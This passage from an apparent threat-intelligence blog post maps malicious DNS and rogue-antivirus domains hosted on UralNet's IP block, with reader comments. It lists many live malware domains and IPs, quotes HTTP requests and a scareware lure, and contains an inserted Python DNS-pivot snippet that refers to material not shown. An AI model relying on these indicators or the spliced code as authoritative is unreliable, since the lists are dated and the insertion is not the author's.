Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-silverlight, application/msword, application/x-silverlight-2-b2, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: greatstabilityscanonline.com

91.211.64.191 - Various exploits hosted on:

91.211.64.191-artovskaja.com
91.211.64.191-domofonosik.com
91.211.64.191-karatmazovs.com
91.211.64.191-molotkaovbiz.com

As I explored in an earlier post, directly serving content is merely one avenue to make money in the hosting space. Managing DNS services for malicious domains is another way that UralNet is being used to facilitate the delivery of malware.

Pointing to 91.211.64.47 is ns1.singatours.com, ns1.skycomputingonline.com, and
ns1.airflysupport.com.
These nameservers are listed as an NS record for the following malicious domains:

advancedantivirusproscan.com
advancedproantivirusscan.com
advertisenetworktour.cn
bestantimalwaredefence.com
bestantimalwaredefense.com
bestantimalwaresoftware.com
bulletproofmonk.cn
centralwebsecurity.cn
controlledsurfaces.cn
getveryluckytoday.cn
liteantimalwarescan.com
liteantimalwarescanner.com
lite-anti-spyware-pro-scanner.com
lite-antispyware-pro-scanner.com
liteantispywareproscanner.com
liteantivirusproscan.com
liteantivirusproscanner.com
lite-anti-virus-scan.com
lite-antivirus-scan.com
liteantivirusscan.com
lite-anti-virus-scanner.com
lite-antivirus-scanner.com
liteantivirusscanner.com
liveantimalwarescan.com
liveantimalwarescanner.com
luckypowertools.cn
onlineantimalwareproscan.com
onlineantimalwarescan.com
ourlifeisverygood.cn
premiumantiviruspccheck.com
premiumantiviruspcscan.com
premiumlivespywarescan.com
proantimalwareonlinescan.com
proantimalwarescan.com
pro-antimalware-scanner.com
professionalantivirusscanner.com
promolegotools.cn
prosystemonlinescan.com
prosystemonlinescanner.com
pro-system-scan.com
prosystemscan.com
prosystemscanner.com
thebestworldparty.cn
verifyclickssystem.cn
worldcommercialbusiness.cn

On 91.211.64.71 is ns1.admediastats.com, ns1.of-ficialstat.com, ns1.stats-manager-online.com,
ns1.themonitoring.net, ns1.clickanalytic.com, ns1.st-athome.net, and ns1.traffic-ad-manager.com

These are NS records for the following malicious domains:
admediastats.com
of-ficialstat.com
stats-manager-online.com
themonitoring.net
clickanalytic.com
st-athome.net
traffic-ad-manager.com

On 91.211.64.118 is ns1.dnsmytruedns.com which provides services for:
ffseik.com
porgacig.cn
teirkmm.net

On 91.211.64.130 is ns2.extrafilesstorage.com which is the secondary (but only responding) NS
record for extrafilesstorage.com, which might seem legitimate, but Google agrees with my assessment.

On 91.211.64.173 and 91.211.64.174 is ns1. and ns2.stabilityscan.com, which are the NS for
stabilityscan.com

On 91.211.65.110 and 91.211.65.111 is ns1 and ns2.stabilityscanonline.com, which are the NS for
stabilityscanonline.com

91.211.64.191 is ns1 AND ns2.molotkaovbiz.com which provide services for the following malicious
domains:
molotkaovbiz.com
karatmazovs.com
artovskaja.com
domofonosik.com

91.211.65.130 is ns1.internetskim.com and ns1.stabilityinternetearthguide.com
91.211.65.131 is ns2.internetskim.com and ns2.stabilityinternetearthguide.com
These host internetskim.com and greatstabilityscanonline.com, both malicious.

91.211.65.23 is ns (not ns1) and ns2.australianpornomovies.com which are the NS for
australianpornomovies.com, which might seem appealing but it's really a malware distribution point.

91.211.65.29 is ns1 and ns2.easywebsiteauditor.ru for easywebsiteauditor.ru
(pushes/pushed out Pushdo/Cutwail)

91.211.65.50-ns1.avscan7.com, 91.211.66.10-ns2.avscan7.com - avscan7.com
91.211.65.50-ns1.scan5new.com, 91.211.66.10-ns2.scan5new.com - scan5new.com

91.211.65.76-ns1.nscyb.org - russianwolf.ru

91.211.65.99-ns1.uansbiz.biz, 91.211.65.100-ns2.uansbiz.biz
antivirus-xp-pro2009.com
freewebscaners.com
lastcountb.com
onlinenotify.net
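The pivot used throughout this section (resolve a nameserver, check whether its address lands inside the /22, then list every domain that delegates to it) is short enough to script, and the membership check also catches the near miss noted earlier, 91.212.65.29, which is outside the block. The Python below is an added example, not from the post; the NS and A records are a constructed snapshot of a few entries shown above plus a control domain on a documentation-range address, and the function names are my own.

```python
import ipaddress
from collections import defaultdict

# The inetnum from the whois output at the top of the post.
URALNET = ipaddress.ip_network("91.211.64.0/22")

# Constructed resolver snapshot: a handful of NS and A records taken from the
# post, plus a control domain (control.example) whose nameserver sits on a
# documentation-range address. A real run would fill these from dig or passive DNS.
NS_RECORDS = {
    "proantimalwareonlinescan.com": ["ns1.singatours.com", "ns1.skycomputingonline.com"],
    "bulletproofmonk.cn": ["ns1.singatours.com"],
    "stabilityscanonline.com": ["ns1.stabilityscanonline.com", "ns2.stabilityscanonline.com"],
    "russianwolf.ru": ["ns1.nscyb.org"],
    "antivirus-xp-pro2009.com": ["ns1.uansbiz.biz", "ns2.uansbiz.biz"],
    "control.example": ["ns1.control.example"],
}
A_RECORDS = {
    "ns1.singatours.com": "91.211.64.47",
    "ns1.skycomputingonline.com": "91.211.64.47",
    "ns1.stabilityscanonline.com": "91.211.65.110",
    "ns2.stabilityscanonline.com": "91.211.65.111",
    "ns1.nscyb.org": "91.211.65.76",
    "ns1.uansbiz.biz": "91.211.65.99",
    "ns2.uansbiz.biz": "91.211.65.100",
    "ns1.control.example": "203.0.113.5",
}


def in_block(ip, block=URALNET):
    """True when the address falls inside the block (a proper CIDR test, not a string prefix)."""
    return ipaddress.ip_address(ip) in block


def nameservers_in_block(a_records, block=URALNET):
    """Return {nameserver: ip} for nameservers whose A record resolves into the block."""
    return {ns: ip for ns, ip in a_records.items() if in_block(ip, block)}


def pivot_domains_by_ns_ip(ns_records, a_records, block=URALNET):
    """Invert domain -> NS and group by the nameserver's in-block address.

    Returns {ip: sorted domains}. A domain appears under every in-block address
    that one of its nameservers resolves to; this is the walk the post makes
    from a single nameserver host to the rogue-AV domains parked on it.
    """
    hosted = nameservers_in_block(a_records, block)
    by_ip = defaultdict(set)
    for domain, servers in ns_records.items():
        for ns in servers:
            if ns in hosted:
                by_ip[hosted[ns]].add(domain)
    return {ip: sorted(domains) for ip, domains in by_ip.items()}


def domains_served_from_block(ns_records, a_records, block=URALNET):
    """Flat sorted list of every domain with at least one nameserver inside the block."""
    found = set()
    for domains in pivot_domains_by_ns_ip(ns_records, a_records, block).values():
        found.update(domains)
    return sorted(found)


if __name__ == "__main__":
    for ip, domains in sorted(pivot_domains_by_ns_ip(NS_RECORDS, A_RECORDS).items()):
        print(ip, "->", ", ".join(domains))
```

Using ipaddress for the membership test rather than comparing on "91.211." avoids exactly the off-by-one-octet confusion the post points out, and the same functions work unchanged for any other block once URALNET is swapped out.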

Also, a thanks to reader "Andy" who pointed out that estdomains.com, a former malicious registrar, has their main site, estdomains.com, hosted at UralNet on 91.211.65.72. Upon examining that address, I see thousands of queries heading to that IP for various NS servers.

91.211.65.72-imbo144179.managedns1.estboxes.com
91.211.65.72-imbo144179.managedns2.estboxes.com
91.211.65.72-imbo144179.managedns3.estboxes.com
91.211.65.72-imbo144179.managedns4.estboxes.com
91.211.65.72-managedns4.estboxes.com
91.211.65.72-ns1.managedns1.estboxes.com
91.211.65.72-ns2.managedns1.estboxes.com
91.211.65.72-ns3.managedns1.estboxes.com
91.211.65.72-ns4.managedns1.estboxes.com
91.211.65.72-stvl113289.managedns1.estboxes.com
91.211.65.72-stvl113289.managedns2.estboxes.com
91.211.65.72-stvl113289.managedns3.estboxes.com
91.211.65.72-stvl113289.managedns4.estboxes.com
91.211.65.72-b.estdomains.com
91.211.65.72-c.estdomains.com

All the queries were NS, with the exception of b and c.estdomains.com, which were A queries. The b and c.estdomains.com queries successfully resolve, while all the others come back as "refused".

hpHosts shows quite a bit of malware at UralNet, as does MalwareDomainList

I didn't cherry pick through research traffic to find "the worst of the worst" - I was literally able to use
every piece of information I came across in this article. I didn't find a single service on UralNet that
wasn't tied to criminal activity. Some might make the argument that I wasn't looking at any traffic that
originated from Ukraine or Russia, and hence, I might not have seen the legitimate sites hosted there.
This is possible, for live traffic, but I was also able to examine a significant amount of DNS traffic
heading to those blocks, and I couldn't find any trace of legitimacy after crawling those sites. I can't be
sure that UralNet is 100% malicious, rather, I can only say that 100% of what I saw going there was
malicious. The high dispersion of malware throughout their whole /22 makes them extremely suspect.

Alex Lanstein @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com

9 thoughts on “Bad Actors Part 5 - UralNet”

  1. Anybody notice estdomains.com is hosted on IP address: 91.211.65.72 ?
    Not that this is bad but just seems a bit odd.
    Anyways, love the blog and these posts,
    Thanks

  2. Note that currently the uralnet.biz primary and secondary NS hosts seem to not understand that they are authoritative for uralnet.biz, which is ‘convenient’. Another obfuscation technique used by this crew.
    clipped portion of dig +trace NS uralnet.biz:
    biz. 172800 IN NS C.GTLD.biz.
    biz. 172800 IN NS D.GTLD.biz.
    biz. 172800 IN NS E.GTLD.biz.
    ;; Received 346 bytes from 192.228.79.201#53(B.ROOT-SERVERS.NET) in 83 ms
    uralnet.biz. 7200 IN NS DNS1.NDW.RU.
    uralnet.biz. 7200 IN NS DNS2.NDW.RU.
    ;; Received 73 bytes from 2001:503:7bbb:ffff:ffff:ffff:ffff:ff7e#53(G.GTLD.biz) in 150 ms
    . 518400 IN NS E.ROOT-SERVERS.NET.
    . 518400 IN NS F.ROOT-SERVERS.NET.
    .biz servers send us to the proper hosts who send us back to the root…

  3. “Interestingly, I can’t pull an MX record for uralnet.biz. It doesn’t appear they take abuse notifications too seriously.”
    An MX record is not required for receiving mail. If a host hasn’t got one, then the standard behaviour is to use the A record instead.
    RFC 2821 Section 5:
    “If no MX records are found, but an A RR is found, the A RR is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host.”
    http://www.ietf.org/rfc/rfc2821.txt
    O.

  4. Thanks for the comments, guys.
    @Andy - You know, I had seen this and I totally forgot to include it. I updated the article above
    @Olliver - I should have been more specific, my original article included a dig but it was getting too long so I chopped it out. There is no A record either - I updated the article to reflect this.
    As always, I appreciate the input
    -alex

  5. “Anybody notice estdomains.com is hosted on IP address: 91.211.65.72 ?”
    Andy, I just checked and I’m seeing the same:
    $ host estdomains.com
    estdomains.com has address 91.211.65.72
    estdomains.com mail is handled by 10 mail2.estdomains.com.
    estdomains.com mail is handled by 5 mail.estdomains.com.
    O.

  6. Good information guys, just one question…..How do I get this OFF my computer…>?!
    Going back to 91.211.65.99 (onlinenotify.net) I wanted to highlight some fun language, italicized for effect:
    GET /winlogon.htm HTTP/1.1
    Accept: */*
    UA-CPU: x86
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
    Host: onlinenotify.net
    Many viruses were found on your computer such as : Trojan horse, PassCapture, etc. Your personal information can fall into in the “third hands”. Please check up the computer with a special software.
    I agree, those “third hands” can be a real bugger.
    Also on this IP:
    91.211.65.99-freewebscaners.com
    Staggs

  7. After a few sites of mine fell victim to some attacks sql / xss I went through logs of a domain which received little traffic and saw this IP 91.211.64.87. I googled it and found your site. I’m wondering if you have a complete list of IP’s I can add to my htaccess and deny them from coming to my site. I think I can deny *.ru but not 100% sure if I can deny entire TLD’s. I’m still looking for a site that collects these malicious IP’s, I’d like to deny their entire IP blocks.
